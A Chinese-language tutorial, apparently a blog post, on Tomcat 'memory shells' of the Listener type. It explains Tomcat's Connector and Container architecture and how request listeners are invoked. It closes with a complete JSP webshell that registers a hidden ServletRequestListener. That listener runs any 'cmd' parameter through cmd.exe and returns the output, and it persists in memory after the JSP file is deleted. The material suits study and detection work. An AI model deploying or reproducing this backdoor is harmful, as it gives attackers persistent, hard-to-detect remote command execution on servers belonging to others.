Tomcat 内存马（一）Listener型

一、Tomcat介绍

Tomcat的主要功能

tomcat作为一个 Web 服务器，实现了两个非常核心的功能：

Http 服务器功能：进行 Socket 通信(基于 TCP/IP)，解析 HTTP 报文
Servlet 容器功能：加载和管理 Servlet，由 Servlet 具体负责处理 Request 请求

以上两个功能，分别对应着tomcat的两个核心组件连接器（Connector）和容器（Container），连接器负责对外交流（完成 Http 服务器功能），容器负责内部处理（完成 Servlet 容器功能）。

Server

Server 服务器的意思，代表整个 tomcat 服务器，一个 tomcat 只有一个 Server Server 中包含至少一个 Service 组件，用于提供具体服务。
Service

服务是 Server 内部的组件，一个Server可以包括多个Service。它将若干个 Connector 组件绑定到一个 Container
Connector

称作连接器，是 Service 的核心组件之一，一个 Service 可以有多个 Connector，主要连接客户端请求,用于接受请求并将请求封装成 Request 和 Response，然后交给 Container 进行处理，Container 处理完之后在交给 Connector 返回给客户端。
Container

负责处理用户的 servlet 请求

Connector连接器

连接器主要完成以下三个核心功能：

socket 通信，也就是网络编程
解析处理应用层协议，封装成一个 Request 对象
将 Request 转换为 ServletRequest，将 Response 转换为 ServletResponse

以上分别对应三个组件 EndPoint、Processor、Adapter 来完成。Endpoint 负责提供请求字节流给Processor，Processor 负责提供 Tomcat 定义的 Request 对象给 Adapter，Adapter 负责提供标准的 ServletRequest 对象给 Servlet 容器。

Container容器

Container组件又称作Catalina，其是Tomcat的核心。在Container中，有4种容器，分别是Engine、Host、Context、Wrapper。这四种容器成套娃式的分层结构设计。

四种容器的作用：

Engine

表示整个 Catalina 的 Servlet 引擎，用来管理多个虚拟站点，一个 Service 最多只能有一个 Engine，但是一个引擎可包含多个 Host
Host

代表一个虚拟主机，或者说一个站点，可以给 Tomcat 配置多个虚拟主机地址，而一个虚拟主机下可包含多个 Context
Context

表示一个 Web 应用程序，每一个Context都有唯一的path，一个Web应用可包含多个 Wrapper
Wrapper

表示一个Servlet，负责管理整个 Servlet 的生命周期，包括装载、初始化、资源回收等

如以下图，a.com和b.com分别对应着两个Host

tomcat的结构图：

二、Listener内存马

请求网站的时候, 程序先执行listener监听器的内容：Listener -> Filter -> Servlet

Listener是最先被加载的, 所以可以利用动态注册恶意的Listener内存马。而Listener分为以下几种：

ServletContext，服务器启动和终止时触发
Session，有关Session操作时触发
Request，访问服务时触发

其中关于监听Request对象的监听器是最适合做内存马的，只要访问服务就能触发操作。

ServletRequestListener接口

如果在Tomcat要引入listener，需要实现两种接口，分别是LifecycleListener和原生EvenListener。

实现了LifecycleListener接口的监听器一般作用于tomcat初始化启动阶段，此时客户端的请求还没进入解析阶段，不适合用于内存马。

所以来看另一个EventListener接口，在Tomcat中，自定义了很多继承于EventListener的接口，应用于各个对象的监听。

重点来看ServletRequestListener接口

ServletRequestListener用于监听ServletRequest对象的创建和销毁，当我们访问任意资源，无论是servlet、jsp还是静态资源，都会触发requestInitialized方法。

在这里，通过一个demo来介绍下ServletRequestListener与其执行流程

配置tomcat源码调试环境：https://zhuanlan.zhihu.com/p/35454131

写一个继承于ServletRequestListener接口的TestListener：

public class TestListener implements ServletRequestListener {

    @Override

    public void requestDestroyed(ServletRequestEvent sre) {

        System.out.println("执行了TestListener requestDestroyed");

    }

    @Override

    public void requestInitialized(ServletRequestEvent sre) {

        System.out.println("执行了TestListener requestInitialized");

    }

}

在web.xml中配置：

    <listener>

        <listener-class>test.TestListener</listener-class>

    </listener>

访问任意的路径：http://127.0.0.1:8080/11

可以看到控制台打印了信息，tomcat先执行了requestInitialized，然后再执行了requestDestroyed

requestInitialized：在request对象创建时触发

requestDestroyed：在request对象销毁时触发

StandardContext对象

StandardContext对象就是用来add恶意listener的地方

接以上环境，直接在requestInitialized处下断点，访问url后，显示出整个调用链

通过调用链发现，Tomcat在StandardHostValve中调用了我们定义的Listener

跟进context.fireRequestInitEvent，在如图红框处调用了requestInitialized方法

往上追踪后发现，以上的listener是在StandardContext#getApplicationEventListeners方法中获得的

在StandardContext#addApplicationEventListener添加了listener

这时候我们思路是，调用StandardContext#addApplicationEventListener方法，add我们自己写的恶意listener

在jsp中如何获得StandardContext对象

方式一：

<%

    Field reqF = request.getClass().getDeclaredField("request");

    reqF.setAccessible(true);

    Request req = (Request) reqF.get(request);

    StandardContext context = (StandardContext) req.getContext();

%>

方式二：

    WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

    StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

以下是网络上公开的内存马：

test.jsp

<%@ page import="org.apache.catalina.core.StandardContext" %>

<%@ page import="java.lang.reflect.Field" %>

<%@ page import="org.apache.catalina.connector.Request" %>

<%@ page import="java.io.InputStream" %>

<%@ page import="java.util.Scanner" %>

<%@ page import="java.io.IOException" %>

<%!

    public class MyListener implements ServletRequestListener {

        public void requestDestroyed(ServletRequestEvent sre) {

            HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();

            if (req.getParameter("cmd") != null){

                InputStream in = null;

                try {

                    in = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",req.getParameter("cmd")}).getInputStream();

                    Scanner s = new Scanner(in).useDelimiter("\\A");

                    String out = s.hasNext()?s.next():"";

                    Field requestF = req.getClass().getDeclaredField("request");

                    requestF.setAccessible(true);

                    Request request = (Request)requestF.get(req);

                    request.getResponse().getWriter().write(out);

                }

                catch (IOException e) {}

                catch (NoSuchFieldException e) {}

                catch (IllegalAccessException e) {}

            }

        }

        public void requestInitialized(ServletRequestEvent sre) {}

    }

%>

<%

    Field reqF = request.getClass().getDeclaredField("request");

    reqF.setAccessible(true);

    Request req = (Request) reqF.get(request);

    StandardContext context = (StandardContext) req.getContext();

    MyListener listenerDemo = new MyListener();

    context.addApplicationEventListener(listenerDemo);

%>

首先访问上传的test.jsp生成listener内存马，之后即使test.jsp删除，只要不重启服务器，内存马就能存在。